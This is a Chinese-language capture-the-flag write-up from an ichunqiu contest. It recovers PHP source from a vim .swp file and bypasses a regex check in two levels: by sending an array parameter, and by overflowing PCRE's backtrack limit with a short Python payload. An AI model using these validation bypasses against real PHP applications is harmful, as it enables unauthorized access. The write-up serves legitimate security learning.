以ichunqiu欢乐赛为例子
1.通过.swp 文件恢复出php脚本
vi index.php.swp
recover
2.第一关源码为
<?php
function areyouok($greeting){
return preg_match('/Merry.*Christmas/is',$greeting);
}
$greeting=@$_POST['greeting'];
if(!areyouok($greeting)){
if(strpos($greeting,'Merry Christmas')!==false){
echo 'Merry Christmas. '.'flag{xxxxxx}';
}else{
echo 'Do you know .swp file?';
}
}else{
echo 'Do you know PHP?';
}
?>
php大部分函数无法处理数组,所以想到用数组绕过
当传入的参数为数组时,我把返回的值dump出来,发现preg_match()的返回值,就会是布尔类型的false。但是strpos()的返回值就会变成NULL
当我们传入greeting[]=Merry Christmas时,preg_match就会出现错误,返回false
然后if(strpos($greeting,'Merry Christmas')!==false) !==符号判断了false的类型
因为返回值为NULL所以,成功绕过两个函数。
3.第二关源码为
<?php
function areyouok($greeting){
return preg_match('/Merry.*Christmas/is',$greeting);
}
$greeting=@$_POST['greeting'];
if(!is_array($greeting)){
if(!areyouok($greeting)){
if(strpos($greeting,'Merry Christmas')!==false){
echo 'Merry Christmas. '.'flag{xxxxxx}';
}else{
echo 'Do you know .swp file?';
}
}else{
echo 'Do you know PHP?';
}
}
?>
4.第二关比第一关多了
if(!is_array($greeting)) 验证提交的变量是否为数组,所以上面的方法就用不了了
查资料知道了(详细资料:http://www.laruence.com/2010/06/08/1579.html)
在PHP的pcre扩展中, 提供了俩个设置项
我本地的回溯上限为1000000,默认的回溯上限为100000。
当输入的字符串超过这个限制的时候,preg_match()这个函数就会出错,返回false
构造payload
import requests
data = {"greeting":"Merry Christmas" + "aaaaa" * 1000000}
res = requests.post('http://localhost/test.php', data=data, allow_redirects=False)
print res.content
本地测试结果
成功绕过正则匹配函数,成功绕过拿到flag